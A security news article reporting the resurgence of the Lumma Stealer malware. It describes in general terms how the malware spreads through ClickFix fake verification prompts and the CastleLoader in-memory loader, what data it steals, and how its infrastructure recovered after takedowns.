Lumma Stealer is active again and spreading widely through attacks that are difficult to detect. Security researchers are seeing a clear increase in infections in which victims are tricked into executing malicious commands on their own via deceptive websites.
According to Ars Technica, this approach, known as ClickFix, combines with advanced loader malware to enable the final infection.
CastleLoader plays an important role in the current campaign. This loader runs exclusively in memory and therefore leaves little trace on the hard drive. This makes it more difficult for traditional security solutions to recognize the threat. The code is also heavily obfuscated, and communication with the controlling infrastructure is flexible. Once CastleLoader is active, Lumma Stealer is brought in as a second phase.
The distribution method is remarkably simple. Victims receive instructions via a fake verification or error message to copy text and paste it into the Windows execution window. What looks like an innocent verification process turns out to be the launch of malicious code. Researchers point out that this tactic works mainly because users have become accustomed to technical workarounds and verification steps, lowering the threshold for following instructions.
Once installed, Lumma focuses on collecting sensitive information. This includes stored passwords, browser data, documents, crypto wallet information, and authentication data. System information is also stolen, allowing attackers to profile victims or carry out more targeted follow-up actions. The stolen data can be used for further attacks or resold within criminal networks.
Rapid reconstruction of criminal network
It is striking that the infrastructure behind the malware has been quickly rebuilt after previous disruptions by investigative services. By using rotating domains and sometimes legitimate online services to host files, the operators can make detection more difficult and reduce suspicion.
Lumma appeared on cybercrime forums several years ago as a service model for information theft. Customers could pay to use a ready-made infrastructure to steal data. International actions previously shut down part of that network, but the current resurgence shows that the ecosystem recovers relatively easily.
The return of Lumma underscores that disrupting infrastructure does not automatically mean the end of a malware campaign. As long as social engineering remains effective and technical barriers are low, threat actors can resume their activities. It is therefore crucial for organizations and users to remain alert to unexpected instructions that require manual system actions.